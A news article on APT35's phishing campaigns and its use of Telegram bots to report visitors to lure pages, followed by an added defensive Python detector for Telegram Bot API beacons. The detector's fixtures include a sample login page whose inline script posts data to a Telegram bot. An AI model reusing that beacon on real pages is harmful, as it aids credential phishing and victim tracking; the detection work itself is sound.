When the Iranian hacking group APT35 wants to know if one of its digital lures has gotten a bite, all it has to do is check Telegram. Whenever someone visits one of the copycat sites they’ve set up, a notification appears in a public channel on the messaging service, detailing the potential victim’s IP address, location, device, browser, and more. It’s not a push notification; it’s a phish notification.
Google’s Threat Analysis Group outlined the novel technique as part of a broader look at APT35, also known as Charming Kitten, a state-sponsored group that has spent the last several years trying to get high-value targets to click on the wrong link and cough up their credentials. And while APT35 isn’t the most successful or sophisticated threat on the international stage—this is the same group, after all, that accidentally leaked hours of videos of themselves hacking—their use of Telegram stands out as an innovative wrinkle that could pay dividends.
The group uses a variety of approaches to try to get people to visit their phishing pages in the first place. Google outlined a few scenarios it has observed lately: the compromise of a UK university website, a fake VPN app that briefly snuck into the Google Play Store, and phishing emails in which the hackers pretend to be organizers of real conferences, and attempt to entrap their marks through malicious PDFs, Dropbox links, websites, and more.
In the case of the university website, the hackers direct potential victims to the compromised page, which encourages them to log in with the service provider of their choice—everything from Gmail to Facebook to AOL is on offer—to view a webinar. If you enter your credentials, they go straight to APT35, which also asks for your two-factor authentication code. It’s a technique so old it’s got whiskers on it; APT35 has been running it since 2017 to target people in government, academia, national security, and more.
The fake VPN isn’t especially innovative, either, and Google says it booted the app from its store before anyone managed to download it. If anyone had fallen for the ruse, though—or does install it on another platform where it’s still available—the spyware can steal call logs, texts, location data, and contacts.
Frankly, APT35 are not exactly overachievers. While they convincingly impersonated officials from the Munich Security Conference and Think-20 Italy in recent years, that too is straight out of Phishing 101. “This is a very prolific group that has a wide target set, but that wide target set is not representative of the level of success the actor has,” says Ajax Bash, security engineer at Google TAG. “Their success rate is actually very low.”
Charming Kitten didn’t limit itself to classy conference pages, according to security firm Mandiant, which also observed its use of Telegram in July. “The actors created malicious webpages masquerading as an adult content website and a free audio/video calling and instant messenger software,” Mandiant associate analyst Emiel Haeghebaert and senior principal analyst Sarah Jones wrote in an emailed comment. “The landing pages profiled visitors to the page and sent information on the visitors back to a Telegram channel that we suspect the threat actors monitored.”
Hackers have abused Telegram before. In April, security firm Check Point found that the platform was being used as part of the command and control infrastructure for malware it called ToxicEye. And the company has taken plenty of flak for its failure to keep extremists and scammers off its channels. But while APT35’s use of Telegram bots as a notification service is less extreme than those abuses, it’s also much harder to proactively detect.
“The content in question is seemingly random messages that do not contain visible signs of abuse,” says Telegram spokesperson Mike Ravdonikas. “They could be anything, e.g., some programmer debugging their code.” Telegram says it took down all the bots and channels as soon as Google reported them, along with “similar public channels and bots we were able to identify thanks to the report,” says Ravdonikas. But unless you can connect a list of IP addresses and so on to an active phishing campaign, he adds, you can’t say with certainty that a bot broadcasting them has malicious intent.
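The notification channel Google TAG and Mandiant describe is a landing page (or the server behind it) posting visitor details to a Telegram bot, and Ravdonikas’s point is that from Telegram’s side those messages look like anything else. From the defender’s side the beacon is more visible: a web host that serves a login page has no business talking to the Telegram Bot API at all. What follows is an added example, not code from the article, Google, Mandiant or Telegram. It is a small Python detector that scans egress-proxy log lines from web hosts and the source of a page for URLs in the public Bot API shape, `https://api.telegram.org/bot<token>/<method>`, and reports each hit with the bot token cut down to its numeric id. The log format, hostnames, tokens, page snippet and allowlist are all constructed for the example.

```python
"""Egress-side detector for Telegram Bot API beacons.

Added example, not code from the article or from Google TAG, Mandiant or
Telegram. It looks for the channel the article describes: a phishing
landing page, or the server behind it, posting visitor details to the
public Telegram Bot API (URL shape https://api.telegram.org/bot<token>/<method>).
Both inputs below are constructed: egress proxy log lines from web hosts
and the HTML of one page. Bot tokens are redacted to their numeric id.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Public Telegram Bot API URL shape. The token format (numeric id, colon,
# secret) follows Telegram's documentation; the method is e.g. sendMessage.
TELEGRAM_BOT_API = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)"
)

# Constructed log lines: "<timestamp> <source-host> <verb> <url> <status>".
# Hostnames and tokens are invented for the example.
SAMPLE_PROXY_LOG = [
    "2021-10-14T09:12:01Z web-01 POST https://api.telegram.org/bot123456789:AAExampleSecretNotReal/sendMessage 200",
    "2021-10-14T09:12:05Z web-01 GET https://cdn.example.com/jquery.min.js 200",
    "2021-10-14T09:13:44Z ops-alerts POST https://api.telegram.org/bot987654321:AAOpsAlertingNotReal/sendMessage 200",
    "2021-10-14T09:14:10Z web-02 GET https://api.telegram.org/ 200",
]

# Constructed page source: a login page whose inline script beacons to a bot.
SAMPLE_PAGE = """<html><body><form id="login">...</form>
<script>
fetch("https://api.telegram.org/bot123456789:AAExampleSecretNotReal/sendMessage",
      {method: "POST"});
</script></body></html>"""


@dataclass(frozen=True)
class Finding:
    source: str   # where it was seen: "line N host H" or "page"
    method: str   # Telegram API method, e.g. sendMessage
    bot_id: str   # numeric part of the token only; the secret is dropped


def redact(token: str) -> str:
    """Keep the bot's numeric id (enough to report to Telegram), drop the secret."""
    return token.split(":", 1)[0]


def scan_text(text: str, source: str) -> list[Finding]:
    """Return one Finding per Bot API URL found in the text."""
    return [Finding(source, m.group("method"), redact(m.group("token")))
            for m in TELEGRAM_BOT_API.finditer(text)]


def scan_proxy_log(lines: list[str],
                   host_allowlist: frozenset[str] = frozenset()) -> list[Finding]:
    """Flag Bot API requests from hosts that should not be talking to a chat bot.

    A web server serving a login page has no reason to post to Telegram; an
    internal alerting host might, so callers pass those hosts as an allowlist.
    Lines that do not fit the constructed format are skipped.
    """
    findings: list[Finding] = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        host, url = fields[1], fields[3]
        if host in host_allowlist:
            continue
        findings.extend(scan_text(url, f"line {n} host {host}"))
    return findings


def scan_page_source(html: str) -> list[Finding]:
    """Flag Bot API URLs embedded in a page, e.g. a beacon in inline script."""
    return scan_text(html, "page")


if __name__ == "__main__":
    hits = scan_proxy_log(SAMPLE_PROXY_LOG, frozenset({"ops-alerts"}))
    hits += scan_page_source(SAMPLE_PAGE)
    for f in hits:
        print(f"{f.source}: {f.method} via bot {f.bot_id}")
```

The numeric bot id is kept because it is what a takedown report to Telegram needs, while the secret half of the token is never written to the alert, so the detector output can go to a SIEM without itself becoming a credential leak. The same regex applied to the page source catches the case where the beacon runs in the visitor’s browser rather than on the server, which the proxy log would never see.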
The good news is that APT35 likely isn’t coming after you, unless you work in an industry rife with sensitive information. Its new twist on phishing alerts, though, could give it and copycat criminal hackers one more edge in a fight that’s already unfair.